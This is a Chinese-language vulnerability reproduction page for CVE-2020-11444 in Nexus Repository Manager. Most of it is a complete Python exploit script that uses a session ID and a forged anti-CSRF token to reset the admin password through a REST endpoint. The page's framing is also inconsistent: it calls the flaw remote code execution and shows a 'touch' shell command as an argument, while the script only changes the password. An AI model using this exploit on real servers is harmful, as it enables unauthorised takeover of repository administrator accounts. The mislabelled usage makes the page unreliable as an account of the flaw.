(CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞

一、漏洞简介

该漏洞源于不正确的访问控制。攻击者可借助特制的请求利用该漏洞绕过访问限制。

二、漏洞影响

Nexus Repository Manager 3.x版本至3.21.2版本

三、复现过程

cve-2020-11444_exp.py
python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "sessionID" "touch /tmp/233"
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub

import sys
import requests

if len(sys.argv)!=4:
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                                          +')
    print('+      CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password                          +')
    print('+-----------------------------------------------------------------------------------------------+')
    print('+ USE: python3 <filename> <url> <session> <password>                                            +')
    print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456 +')
    print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1                                         +')
    print('+-----------------------------------------------------------------------------------------------+')
    sys.exit(0)

url = sys.argv[1]
vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
session = sys.argv[2]
password = sys.argv[3]

headers = {
    'accept': "application/json",
    'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
    'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
    'Content-Type': "text/plain",
    'Origin': "http://127.0.0.1:8081",
    'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID="+session+""
}
data = """%s""" % password

r = requests.request('PUT', url=vuln_url, headers=headers, data=data)
if r.status_code == 204:
    print ("[+] Passowrd Change Success")
    print ("[+] " + url)
    print ("[+] Username:admin Passowrd:"+password+"")
else:
    print ("[-] SessionID Not available")
    print ("[-] Target Not CVE-2020-11444 Vuln Good Luck")
    sys.exit(0)

参考链接

https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py